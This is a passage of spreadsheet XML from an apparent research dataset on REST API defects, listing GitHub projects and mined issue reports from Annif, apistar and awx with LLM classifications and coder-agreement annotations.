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itHub Project Analysis" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="LLM-classified Issues Analysis " sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="ClusterTopic Analysis (6 defect" sheetId="3" r:id="rId6"/>
    <sheet state="visible" name="RQ1 (607 defects classified int" sheetId="4" r:id="rId7"/>
    <sheet state="visible" name="RQ2 (Patched File Types Analysi" sheetId="5" r:id="rId8"/>
    <sheet state="visible" name="RQ2 (Time to Fix Analysis)" sheetId="6" r:id="rId9"/>
    <sheet state="visible" name="RQ3 (Mapping Taxonomy with Evom" sheetId="7" r:id="rId10"/>
    <sheet state="visible" name="Defects4REST v1.0 benchmark (47" sheetId="8" r:id="rId11"/>
  </sheets>
  <definedNames>
    <definedName hidden="1" localSheetId="3" name="_xlnm._FilterDatabase">'RQ1 (607 defects classified int'!$A$1:$E$608</definedName>
  </definedNames>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="9611" uniqueCount="3803">
  <si>
    <t>Repository Name</t>
  </si>
  <si>
    <t>Language</t>
  </si>
  <si>
    <t>Repository URL</t>
  </si>
  <si>
    <t>REST API Defects (llm)</t>
  </si>
  <si>
    <t>Mined Issues</t>
  </si>
  <si>
    <t>Annif</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>https://github.com/NatLibFi/Annif</t>
  </si>
  <si>
    <t>apistar</t>
  </si>
  <si>
    <t>https://github.com/encode/apistar</t>
  </si>
  <si>
    <t>awx</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx</t>
  </si>
  <si>
    <t>Catwatch</t>
  </si>
  <si>
    <t>Java</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="&quot;Aptos Narrow&quot;, sans-serif"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>https://github.com/zalando-incubator/catwatch</t>
    </r>
  </si>
  <si>
    <t>cgm-remote-monitor</t>
  </si>
  <si>
    <t>JavaScript</t>
  </si>
  <si>
    <t>https://github.com/nightscout/cgm-remote-monitor</t>
  </si>
  <si>
    <t>cwa-verification-server</t>
  </si>
  <si>
    <t>https://github.com/corona-warn-app/cwa-verification-server</t>
  </si>
  <si>
    <t>digdag</t>
  </si>
  <si>
    <t>https://github.com/treasure-data/digdag</t>
  </si>
  <si>
    <t>djoser</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser</t>
  </si>
  <si>
    <t>dolibarr</t>
  </si>
  <si>
    <t>PHP</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr</t>
  </si>
  <si>
    <t>DSpace</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace</t>
  </si>
  <si>
    <t>elassandra</t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra</t>
  </si>
  <si>
    <t>elasticsearch</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch</t>
  </si>
  <si>
    <t>enviroCar-server</t>
  </si>
  <si>
    <t>https://github.com/enviroCar/enviroCar-server/</t>
  </si>
  <si>
    <t>flowable-engine</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine</t>
  </si>
  <si>
    <t>Ghost</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost</t>
  </si>
  <si>
    <t>granary</t>
  </si>
  <si>
    <t>https://github.com/snarfed/granary</t>
  </si>
  <si>
    <t>harness</t>
  </si>
  <si>
    <t>Go</t>
  </si>
  <si>
    <t>https://github.com/harness/harness</t>
  </si>
  <si>
    <t>hummingbot</t>
  </si>
  <si>
    <t>https://github.com/hummingbot/hummingbot</t>
  </si>
  <si>
    <t>hydrus</t>
  </si>
  <si>
    <t>https://github.com/HTTP-APIs/hydrus</t>
  </si>
  <si>
    <t>kafka-rest</t>
  </si>
  <si>
    <t>https://github.com/confluentinc/kafka-rest</t>
  </si>
  <si>
    <t>label-studio</t>
  </si>
  <si>
    <t>https://github.com/HumanSignal/label-studio</t>
  </si>
  <si>
    <t>localsend</t>
  </si>
  <si>
    <t>Dart</t>
  </si>
  <si>
    <t>https://github.com/localsend/localsend</t>
  </si>
  <si>
    <t>management-api-for-apache-cassandra</t>
  </si>
  <si>
    <t>https://github.com/k8ssandra/management-api-for-apache-cassandra</t>
  </si>
  <si>
    <t>mastodon</t>
  </si>
  <si>
    <t>Ruby</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon</t>
  </si>
  <si>
    <t>Mobile-Security-Framework-MobSF</t>
  </si>
  <si>
    <t>https://github.com/MobSF/Mobile-Security-Framework-MobSF</t>
  </si>
  <si>
    <t>modular-monolith-with-ddd</t>
  </si>
  <si>
    <t>C#</t>
  </si>
  <si>
    <t>https://github.com/kgrzybek/modular-monolith-with-ddd</t>
  </si>
  <si>
    <t>mygpo</t>
  </si>
  <si>
    <t>https://github.com/gpodder/mygpo</t>
  </si>
  <si>
    <t>netbox</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox</t>
  </si>
  <si>
    <t>nocodb</t>
  </si>
  <si>
    <t>TypeScript</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb</t>
  </si>
  <si>
    <t>nopCommerce</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce</t>
  </si>
  <si>
    <t>OrchardCore</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore</t>
  </si>
  <si>
    <t>outline-server</t>
  </si>
  <si>
    <t>https://github.com/Jigsaw-Code/outline-server</t>
  </si>
  <si>
    <t>plane</t>
  </si>
  <si>
    <t>https://github.com/makeplane/plane</t>
  </si>
  <si>
    <t>podman</t>
  </si>
  <si>
    <t>https://github.com/containers/podman</t>
  </si>
  <si>
    <t>redash</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash</t>
  </si>
  <si>
    <t>refugerestrooms</t>
  </si>
  <si>
    <t>https://github.com/RefugeRestrooms/refugerestrooms</t>
  </si>
  <si>
    <t>restcountries</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries</t>
  </si>
  <si>
    <t>seaweedfs</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs</t>
  </si>
  <si>
    <t>shopizer</t>
  </si>
  <si>
    <t>https://github.com/shopizer-ecommerce/shopizer</t>
  </si>
  <si>
    <t>signal-cli-rest-api</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api</t>
  </si>
  <si>
    <t>silver</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver</t>
  </si>
  <si>
    <t>SpaceX-API</t>
  </si>
  <si>
    <t>https://github.com/r-spacex/SpaceX-API</t>
  </si>
  <si>
    <t>spring-petclinic-rest</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest</t>
  </si>
  <si>
    <t>stf</t>
  </si>
  <si>
    <t>https://github.com/openstf/stf</t>
  </si>
  <si>
    <t>strapi</t>
  </si>
  <si>
    <t>https://github.com/strapi/strapi</t>
  </si>
  <si>
    <t>supabase</t>
  </si>
  <si>
    <t>https://github.com/supabase/supabase</t>
  </si>
  <si>
    <t>traefik</t>
  </si>
  <si>
    <t>https://github.com/traefik/traefik</t>
  </si>
  <si>
    <t>uptime-kuma</t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma</t>
  </si>
  <si>
    <t>vercel</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel</t>
  </si>
  <si>
    <t>WP-API</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API</t>
  </si>
  <si>
    <t>zuul</t>
  </si>
  <si>
    <t>https://github.com/Netflix/zuul</t>
  </si>
  <si>
    <t>issue_no</t>
  </si>
  <si>
    <t>repo</t>
  </si>
  <si>
    <t>issue_url</t>
  </si>
  <si>
    <t>title</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>prediction</t>
  </si>
  <si>
    <t>confidence</t>
  </si>
  <si>
    <t>manual_analysis (Coder1)</t>
  </si>
  <si>
    <t>manual_analysis (Coder2)</t>
  </si>
  <si>
    <t>Coder1</t>
  </si>
  <si>
    <t>Coder2</t>
  </si>
  <si>
    <t>Common</t>
  </si>
  <si>
    <t>Coder2 comments</t>
  </si>
  <si>
    <t>Coder1 comments</t>
  </si>
  <si>
    <t>agreement</t>
  </si>
  <si>
    <t>https://github.com/NatLibFi/Annif/issues/27</t>
  </si>
  <si>
    <t>Support Problem JSON in Swagger spec and REST API</t>
  </si>
  <si>
    <t>Our REST responses in error situations should follow [RFC 7807](https://tools.ietf.org/html/rfc7807). Some concrete guidance can be found in the [Zalando RESTful API guidelines](https://zalando.github.io/restful-api-guidelines/#176)</t>
  </si>
  <si>
    <t>bug</t>
  </si>
  <si>
    <t>? - enhancement</t>
  </si>
  <si>
    <t>Confusion matrix:</t>
  </si>
  <si>
    <t>https://github.com/NatLibFi/Annif/issues/187</t>
  </si>
  <si>
    <t>Improved error handling</t>
  </si>
  <si>
    <t>There are many ways to trigger an error using Annif. These include * defining a project with missing settings (e.g. vocab is now practically mandatory) * trying to load documents before loading a vocabulary * trying to analyze documents before loading a vocabulary or training the model Some of these may also be triggered via the REST API, especially the last one. In these situations Annif should output a helpful error message instead of crashing with a traceback.</t>
  </si>
  <si>
    <t>A2: Defect (616)</t>
  </si>
  <si>
    <t>A2: Non-defect (292)</t>
  </si>
  <si>
    <t>Row total</t>
  </si>
  <si>
    <t>https://github.com/NatLibFi/Annif/issues/208</t>
  </si>
  <si>
    <t>Robustness issues in HTTP backend</t>
  </si>
  <si>
    <t>These issues are similar enough that I'm only opening a single issue. When using the `arto-fi` data set to train a PAV model, I got this exception: ``` File "/srv/Annif/annif/backend/pav.py", line 69, in _analyze_train_corpus hits = source_project.analyze(doc.text) File "/srv/Annif/annif/project.py", line 158, in analyze hits_from_backends = self._analyze_with_backends(text, backend_params) File "/srv/Annif/annif/project.py", line 109, in _analyze_with_backends hits = backend.analyze(text, project=self, params=beparams) File "/srv/Annif/annif/backend/backend.py", line 53, in analyze return self._analyze(text, project, params=beparams) File "/srv/Annif/annif/backend/http.py", line 17, in _analyze req = requests.post(params['endpoint'], data=data) File "/srv/Annif/.venv/lib/python3.6/site-packages/requests/api.py", line 116, in post return request('post', url, data=data, json=json, **kwargs) File "/srv/Annif/.venv/lib/python3.6/site-packages/requests/api.py", line 60, in request return session.request(method=method, url=url, **kwargs) File "/srv/Annif/.venv/lib/python3.6/site-packages/requests/sessions.py", line 533, in request resp = self.send(prep, **send_kwargs) File "/srv/Annif/.venv/lib/python3.6/site-packages/requests/sessions.py", line 646, in send r = adapter.send(request, **kwargs) File "/srv/Annif/.venv/lib/python3.6/site-packages/requests/adapters.py", line 498, in send raise ConnectionError(err, request=request) requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer')) ``` When training a PAV model with the `jyu-fin` data set, I got this: ``` File "/srv/Annif/annif/backend/pav.py", line 80, in _create_pav_model scores, true = self._analyze_train_corpus(source_project, corpus) File "/srv/Annif/annif/backend/pav.py", line 69, in _analyze_train_corpus hits = source_project.analyze(doc.text) File "/srv/Annif/annif/project.py", line 158, in analyze hits_from_backends = self._analyze_with_backends(text, backend_params) File "/srv/Annif/annif/project.py", line 109, in _analyze_with_backends hits = backend.analyze(text, project=self, params=beparams) File "/srv/Annif/annif/backend/backend.py", line 53, in analyze return self._analyze(text, project, params=beparams) File "/srv/Annif/annif/backend/http.py", line 26, in _analyze for h in results File "/srv/Annif/annif/backend/http.py", line 27, in &lt;listcomp&gt; if h['score'] &gt; 0.0], TypeError: string indices must be integers ``` In both cases the problem is that HTTP exceptions and other error conditions are not properly handled by the HTTP backend.</t>
  </si>
  <si>
    <t>A1: Defect (612)</t>
  </si>
  <si>
    <t>https://github.com/NatLibFi/Annif/issues/389</t>
  </si>
  <si>
    <t>Annif breaks when MauiServer returns malformed URIs for topic IDs</t>
  </si>
  <si>
    <t>### Steps to reproduce ``` annif loadvoc rula-maui-en Annif-corpora/vocab/lcsh/lcsh.ttl annif train rula-maui-en Annif-corpora/fulltext/rula/validate/ ``` https://github.com/mjsuhonos/Annif-corpora/blob/master/vocab/lcsh/lcsh.ttl https://github.com/mjsuhonos/Annif-corpora/tree/master/fulltext/rula/validate ``` annif eval rula-maui-en Annif-corpora/fulltext/rula/test/ -v DEBUG ``` ```python … warning: Unknown subject URI &lt;http://id.loc.gov/authorities/subjects/http://id.loc.gov/authorities/genreForms/gf2011026450&gt; Traceback (most recent call last): File "/usr/local/bin/annif", line 11, in &lt;module&gt; load_entry_point('annif', 'console_scripts', 'annif')() File "/usr/local/lib/python3.7/site-packages/click/core.py", line 764, in __call__ return self.main(*args, **kwargs) File "/usr/local/lib/python3.7/site-packages/flask/cli.py", line 586, in main return super(FlaskGroup, self).main(*args, **kwargs) File "/usr/local/lib/python3.7/site-packages/click/core.py", line 717, in main rv = self.invoke(ctx) File "/usr/local/lib/python3.7/site-packages/click/core.py", line 1137, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "/usr/local/lib/python3.7/site-packages/click/core.py", line 956, in invoke return ctx.invoke(self.callback, **ctx.params) File "/usr/local/lib/python3.7/site-packages/click/core.py", line 555, in invoke return callback(*args, **kwargs) File "/usr/local/lib/python3.7/site-packages/click/decorators.py", line 17, in new_func return f(get_current_context(), *args, **kwargs) File "/usr/local/lib/python3.7/site-packages/flask/cli.py", line 426, in decorator return __ctx.invoke(f, *args, **kwargs) File "/usr/local/lib/python3.7/site-packages/click/core.py", line 555, in invoke return callback(*args, **kwargs) File "/Annif/annif/cli.py", line 305, in run_eval results = project.suggest(doc.text, backend_params) File "/Annif/annif/project.py", line 161, in suggest hits = self._suggest_with_backend(text, backend_params) File "/Annif/annif/project.py", line 105, in _suggest_with_backend hits = self.backend.suggest(text, beparams) File "/Annif/annif/backend/backend.py", line 67, in suggest return self._suggest(text, params=beparams) File "/Annif/annif/backend/maui.py", line 155, in _suggest return self._response_to_result(response) File "/Annif/annif/backend/maui.py", line 150, in _response_to_result self.project.subjects) File "/Annif/annif/suggestion.py", line 169, in create_from_index subject = subject_index[subject_index.by_uri(hit.uri)] File "/Annif/annif/corpus/subject.py", line 55, in __getitem__ return (self._uris[subject_id], self._labels[subject_id], TypeError: list indices must be integers or slices, not NoneType ``` ### Malformed response Document source (1126 bytes) &gt; Key findings: The survey results for both countries were similar in terms of the percentage of respondents who reported working in smaller newsrooms and working longer hours compared to two years ago Respondents in both countries said that the perception of local newspapers as a dying industry deters advertisers and makes it challenging to recruit new staff Use of metrics to measure engagement and shape the production of stories is about the same in both countries Respondents in Canada and the United States both reported that few employers provided training courses to assist with learning about new technologies While approximately half of the participants in both surveys felt slightly or very secure in their jobs, almost twice as many Canadians felt slightly or very insecure in their jobs American respondents overall tended to be more positive about the future of local newspapers Respondents from American newspapers were more likely to use video reporting, live video and **and podcasts than their Canadian counterparts Researchers who compare the state of local journalism across** ```json { "title": "10 recommendations from rula-maui-en", "topics": [ { "id": "http://id.loc.gov/authorities/subjects/sh85004368", "label": "American newspapers", "probability": 0.06058101652075777 }, { "id": "http://id.loc.gov/authorities/subjects/http://id.loc.gov/authorities/genreForms/gf2011026450", "label": "http://id.loc.gov/authorities/subjects/http://id.loc.gov/authorities/genreForms/gf2011026450", "probability": 0.03634347847356808 }, { "id": "http://id.loc.gov/authorities/subjects/sh85143204", "label": "Video recordings", "probability": 0.02480501693510654 }, { "id": "http://id.loc.gov/authorities/subjects/sh85070585", "label": "Job security", "probability": 0.022298487879186563 }, { "id": "http://id.loc.gov/authorities/subjects/sh2007001518", "label": "Podcasts", "probability": 0.021532180099457447 }, { "id": "http://id.loc.gov/authorities/subjects/sh2006006472", "label": "Podcasting", "probability": 0.021532180099457447 }, { "id": "http://id.loc.gov/authorities/subjects/sh2012001802", "label": "Podcasters", "probability": 0.021532180099457447 }, { "id": "http://id.loc.gov/authorities/subjects/sh85091588", "label": "Newspapers", "probability": 0.01622784151074123 }, { "id": "http://id.loc.gov/authorities/subjects/sh99001641", "label": "Newspapers", "probability": 0.01622784151074123 }, { "id": "http://id.loc.gov/authorities/subjects/sh2007008878", "label": "First responders", "probability": 0.01622784151074123 } ] } ``` ### Correct response Document source (1126 bytes) &gt; Key findings: The survey results for both countries were similar in terms of the percentage of respondents who reported working in smaller newsrooms and working longer hours compared to two years ago Respondents in both countries said that the perception of local newspapers as a dying industry deters advertisers and makes it challenging to recruit new staff Use of metrics to measure engagement and shape the production of stories is about the same in both countries Respondents in Canada and the United States both reported that few employers provided training courses to assist with learning about new technologies While approximately half of the participants in both surveys felt slightly or very secure in their jobs, almost twice as many Canadians felt slightly or very insecure in their jobs American respondents overall tended to be more positive about the future of local newspapers Respondents from American newspapers were more likely to use video reporting, live video and **common questions revealed two notable differences between the countries. The first had to do with sentiments** ```json { "title": "10 recommendations from rula-maui-en", "topics": [ { "id": "http://id.loc.gov/authorities/subjects/sh85004368", "label": "American newspapers", "probability": 0.06058101652075777 }, { "id": "http://id.loc.gov/authorities/subjects/sh85143204", "label": "Video recordings", "probability": 0.02480501693510654 }, { "id": "http://id.loc.gov/authorities/subjects/sh85070585", "label": "Job security", "probability": 0.022298487879186563 }, { "id": "http://id.loc.gov/authorities/subjects/sh85091588", "label": "Newspapers", "probability": 0.01622784151074123 }, { "id": "http://id.loc.gov/authorities/subjects/sh99001641", "label": "Newspapers", "probability": 0.01622784151074123 }, { "id": "http://id.loc.gov/authorities/subjects/sh2007008878", "label": "First responders", "probability": 0.01622784151074123 }, { "id": "http://id.loc.gov/authorities/subjects/sh93009373", "label": "Advertisers", "probability": 0.01382364849909128 }, { "id": "http://id.loc.gov/authorities/subjects/sh85001086", "label": "Advertising", "probability": 0.01382364849909128 }, { "id": "http://id.loc.gov/authorities/subjects/sh2001009077", "label": "Supplementary employment", "probability": 0.01382364849909128 }, { "id": "http://id.loc.gov/authorities/subjects/sh2005004875", "label": "Employability", "probability": 0.01382364849909128 } ] } ``` ### Suspected cause This vocabulary contains two `skos:prefLabel` statements with identical object literals: ``` &lt;http://id.loc.gov/authorities/genreForms/gf2011026450&gt; &lt;http://www.w3.org/2004/02/skos/core#prefLabel&gt; "Podcasts"@en . &lt;http://id.loc.gov/authorities/subjects/sh2007001518&gt; &lt;http://www.w3.org/2004/02/skos/core#prefLabel&gt; "Podcasts"@en . ``` It seems plausible that due to its lexical approach, Maui uses the object literal as a unique value, which would match two topic URIs, given the above statements. The (albeit strangely truncated) concatenation of these two URI values are then returned in the response. This theory is currently being tested. ### Proposed resolution Ideally, Annif could extract valid URIs from the invalid response, but this may be too much overhead if each response URI must be validated. At a minimum, Annif should ignore the malformed response and continue with eg. a warning statement on STDERR.</t>
  </si>
  <si>
    <t>A1: Non-Defect (296)</t>
  </si>
  <si>
    <t>https://github.com/NatLibFi/Annif/issues/459</t>
  </si>
  <si>
    <t>Limit parameter is not passed to MauiServer</t>
  </si>
  <si>
    <t>Maui backend gives at most 10 suggestions even if a larger `limit` value is set in Annif. At training time [only `id` and `lang` parameters are passed to MauiServer](https://github.com/NatLibFi/Annif/blob/98bde2375abe17a6a1d368fd9acae6f2edf09c00/annif/backend/maui.py#L82), and [the default value of 10](https://github.com/NatLibFi/MauiServer/blob/master/src/main/java/org/topbraid/mauiserver/tagger/TaggerConfiguration.java#L36) is always used for `max_topics_per_document`. ``` # http://localhost:8080/mauiserver/tmp-maui-fi/config id | "tmp-maui-fi" -- | -- title | "tmp-maui-fi" description | null lang | "fi" stemmer_class | null stopwords_class | null cross_validation_passes | 10 max_topics_per_document | 10 probability_threshold | 0 ``` When Maui backend is used in an ensemble project, getting more suggestions would be advantageous.</t>
  </si>
  <si>
    <t>Column total</t>
  </si>
  <si>
    <t>https://github.com/NatLibFi/Annif/issues/470</t>
  </si>
  <si>
    <t>NN ensemble may return scores above 1.0</t>
  </si>
  <si>
    <t>The NN ensemble doesn't always return scores in the range 0.0-1.0. For example, the `yso-sv` model currently available in Finto AI returns this for the input text `historia`: ```js { "results": [ { "label": "historia", "notation": null, "score": 1.3140300512313843, "uri": "http://www.yso.fi/onto/yso/p1780" }, [...] } ``` This should be avoided, for example by capping the scores to 1.0.</t>
  </si>
  <si>
    <t>not_bug</t>
  </si>
  <si>
    <t>https://github.com/NatLibFi/Annif/issues/556</t>
  </si>
  <si>
    <t>vocabulary in SKOS (Turtle serialization) should be loaded even in case of lacking language tags</t>
  </si>
  <si>
    <t>Hi! I've noticed some potentially inconsistent behaviour of the annif loadvoc command when loading voacabulary in ttl SKOS without language tags. We've currently switched in our project from simple tsv vocabulary format to SKOS. I assumed that since we do not provide any information about language in tsv file, we don't necessarily have to add appropriate language tags in SKOS either. But it turned out, that loading vocabulary in SKOS without language tags prevents annif from creating the subject index (though original ttl file is being copied and gzipped file is being dumped). It seems, that when annif converts tsv to SKOS, it adds language tags (they're based upon language configuration in projects.cfg), but when it loads vocabulary directly from SKOS format, it checks if language tag for a label is the same as language code in projects.cfg, and when it's not **or if there is no language tag at all** it skips the whole concept: ``` def get_concept_labels(self, concept, label_types, language): return [str(label) for label_type in label_types for label in self.graph.objects(concept, label_type) if label.language == language] ``` ``` @property def subjects(self): for concept in self.concepts: labels = self.get_concept_labels( concept, [SKOS.prefLabel, RDFS.label], self.language) notation = self.graph.value(concept, SKOS.notation, None, any=True) if not labels: continue label = labels[0] if notation is not None: notation = str(notation) yield Subject(uri=str(concept), label=label, notation=notation, text=None) ``` I think, that maybe it would be safer to assume, that when there is no explicit information about the language in SKOS file (there is a label without the language tag), its language corresponds with the language defined in projects.cfg and skip a concept (or label from the concept) only when the language tag truly exists and is not equal to the language from projects.cfg. If this change is not possible for some reasons, it would be nice to provide some information about this behaviour in annif wiki (it took me some time to find this "bug"). Maciej Sagata, National Library of Poland</t>
  </si>
  <si>
    <t>Note: The column totals were recalculated by summing columns:</t>
  </si>
  <si>
    <t>https://github.com/encode/apistar/issues/17</t>
  </si>
  <si>
    <t>Redirect handling</t>
  </si>
  <si>
    <t>Werkzeug can raise a `RequestRedirect` if eg. view is routed to `/foo/`, and a GET request is made to `/foo` (without the trailing slash). We ought to be dealing with those in our [exception handler function](https://github.com/tomchristie/apistar/blob/master/apistar/routing.py#L139), and returning an appropriate response.</t>
  </si>
  <si>
    <t>https://github.com/encode/apistar/issues/94</t>
  </si>
  <si>
    <t>Injecting `http.Body` freezes `apistar run`</t>
  </si>
  <si>
    <t>Decided to play around with the framework, have the following thing: ```python from apistar import http def welcome(body: http.Body): return {'message': 'Welcome to API Star!'} ``` Making a request: ```bash $ curl -X POST -d "" http://localhost:8080/ ``` Everything hangs. Nothing happens until I stop the `apistar run` server. Added a breakpoint inside `Body.build` - the `environ['wsgi.input'].read()` actually hangs. Using Python `3.5.2`.</t>
  </si>
  <si>
    <t>A2 Defect: 607 + 49 = 656</t>
  </si>
  <si>
    <t>https://github.com/encode/apistar/issues/120</t>
  </si>
  <si>
    <t>Graceful handling of malformed RequestData</t>
  </si>
  <si>
    <t>Invalid JSON or invalid form content should result in a 400 response. Also consider if we want to tweak the behavior around empty content at all (at the moment we return `None`)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/4492</t>
  </si>
  <si>
    <t>API/SDK configure CUSTOM_LOGO doesn't take affect</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY When utilizing the UI, one can head to Settings/UI and upload an image file. This "replaces" the Image file on the login screen. One can also view this image in a "data:url" format at api/v2/settings/ui CUSTOM_LOGO: "data:image/png;base64,Base64EncodedStringhere=" Attempting the same via the API or tower-cli (example below) produces no "error" and updates the CUSTOM_LOGO attribute properly when viewed in the API, but doesn't actually "take effect" in that the logo is not actually changed at login. ##### ENVIRONMENT * AWX version: 6.1.0 * AWX install method: openshift * Ansible version: Whatever comes built-in with 6.1.0's ansible virtualenv * Operating System: Openshift 3.11 running on RHEL 7.6 * Web Browser: Firefox ##### STEPS TO REPRODUCE Reproduce using the tower-cli: ``` with open("/path/to/a/png/file.png, 'rb') as logofile: logo_64_encode = base64.b64encode(logofile.read()).decode() created_data_url = 'data:image/png;base64,{}'.format(logo_64_encode) # Placeholder: Setup AWX auth - however you do it since there's 10,000 ways # Set a bunch of other settings as examples - these all WORK FINE # Assuming you have some valid data in login_message and custom_venv_paths variables settings_resource.modify('CUSTOM_LOGIN_INFO', login_message) settings_resource.modify('CUSTOM_VENV_PATHS', json.dumps(custom_venv_paths)) # Setup AWX Custom Logo using above data:url - this shows a successful return and updates CUSTOM_LOGO - but never displays settings_resource.modify('CUSTOM_LOGO', created_data_url) ``` ##### EXPECTED RESULTS if the tower-cli call succeeded (no errors) an i can see the encoded data:url in CUSTOM_LOGO - i would expect a Custom Image to be displayed at the login prompt. ##### ACTUAL RESULTS No image is displayed. Uploading the same image via the UI's "browse" option causes it to display immediately, same apparent data:url object written to CUSTOM_LOGO ##### ADDITIONAL INFORMATION N/A</t>
  </si>
  <si>
    <t>A2 Non-defect: 5 + 247 = 252</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/4531</t>
  </si>
  <si>
    <t>Unable to remove customized messages from notification template</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Unable to remove customized messages from notification template ##### STEPS TO REPRODUCE 1. Create a Slack notification with customized notification messages. 2. Edit Slack notification from step 1 and remove customized notification messages via toggle and save Note: 500 error ##### EXPECTED RESULTS 1. Default messages used and customize message toggle disabled ##### ACTUAL RESULTS HTTP 500 from API ##### ADDITIONAL INFORMATION &lt;img width="1497" alt="Screen Shot 2019-08-20 at 12 43 30 PM" src="https://user-images.githubusercontent.com/12446869/63366604-222dcf80-c348-11e9-80b7-a53a717a4b9f.png"&gt;</t>
  </si>
  <si>
    <t>Sum total = 908</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/4541</t>
  </si>
  <si>
    <t>Notifications - missing hosts with webhook notification</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY We have around 400 hosts in the inventory, however, the notification webhook endpoint receives notification about only around 40-50 hosts. (Sometimes it's working fine reporting all the hosts.) ##### ENVIRONMENT * AWX version: 6.1.0.0 (Same problem with 6.0.0.0) * AWX install method: docker on linux (official image from docker hub) * Ansible version: 2.8.2 * Operating System: Centos7 * Web Browser: Chrome ##### STEPS TO REPRODUCE - Create a webhook notification - Start a job (or job-flow), enable notifications. ##### EXPECTED RESULTS Report from all the hosts in JSON format ##### ACTUAL RESULTS Most of the times only partial host list in the report, sometimes full list. Differs in a job-flow, some jobs reporting about all hosts, some only about a few) Workflow with 2 jobs: Number of hosts, on which the job ran (reported in AWX): 438 Number of hosts reported on the webhook script: 53 ##### ADDITIONAL INFORMATION I also have the same problem with 6.0.0.0 and 6.1.0.0 I tried with different users, with standalon jobs or woth flows, also with different playbooks, the problem looks pretty consistent. Thx</t>
  </si>
  <si>
    <t>Step 1: Calculate observed agreement (Po)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/4542</t>
  </si>
  <si>
    <t>Google Cloud Compute Engine credential type is stripping the json file</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY When a google compute engine credential is created with the json credential file, AWX is stripping some valuable lines. I need those, as I am using gcp_compute_disk module which also requires the service account file to be give as absolute path to the json and instead of giving the file path twice manually, I am using {{ lookup('env','GCP_SERVICE_ACCOUNT_FILE') }} to refer the absolute path to the json, but I am getting error that the lines about email and token_uri are missing. In order to resolve that I was forced to create a custom credential type for uploading the json and use it without stripping. ##### ENVIRONMENT * AWX version: 6.x.x * AWX install method: docker * Ansible version: 2.8.2 * Operating System: Ubuntu 18.04 * Web Browser: Firefox, Chrome ##### STEPS TO REPRODUCE Upload a google json credential to awx and try to use the service_account_file: "{{ lookup('env','GCP_SERVICE_ACCOUNT_FILE') }}" when using the gcp_compute_disk module for example. Your AWX template must be pointed to the gce credential also. ##### EXPECTED RESULTS get the full json and take all needed lines ##### ACTUAL RESULTS gets the json, but it seems the AWX module for gce credenials strips some lines and the file is usable by the gcp_compute_* ansible modules. ##### ADDITIONAL INFORMATION New credential type I've used to get around this is: Input configuration: `fields: - id: gcp_credential_file type: string label: GCP Credential File (JSON) secret: true multiline: true` Injector configuration: `env: GCP_SERVICE_ACCOUNT_FILE: '{{ tower.filename }}' file: template: '{{ gcp_credential_file }}'`</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/4573</t>
  </si>
  <si>
    <t>CLI: Need general solution for dictionary-like inputs</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY &lt;!-- Briefly describe the problem. --&gt; This is a general problem but I'm going to flesh out one particular use case for now: Currently, credential type creation does not accept inputs. New credential types need to have some kind of inputs in order to be of any use. Currently the CLI and APi have conflicting constraints on the `--inputs` flag so there is no way to pass it....at least not that I could figure out. ##### STEPS TO REPRODUCE &lt;!-- Please describe exactly how to reproduce the problem. --&gt; Passing any type of dictionary like thing gets an error from the CLI saying it should be an integer: ``` awx credential_types create --name foo_cred_type1 --kind cloud --inputs="\{'fields': [\{'id': 'password', 'label':'password', 'secret':true, 'type':'string'\}]\}" usage: awx credential_types create [-h] --name TEXT [--description TEXT] --kind {net,cloud} [--inputs INPUTS] [--injectors INJECTORS] required arguments: --kind {net,cloud} [REQUIRED] optional arguments: -h, --help show this help message and exit --description TEXT Optional description of this credential type. --inputs INPUTS Enter inputs using either JSON or YAML syntax. Use the radio button to toggle between the two. Refer to the Ansible Tower documentation for example syntax. --injectors INJECTORS Enter injectors using either JSON or YAML syntax. Use the radio button to toggle between the two. Refer to the Ansible Tower documentation for example syntax. required arguments: --name 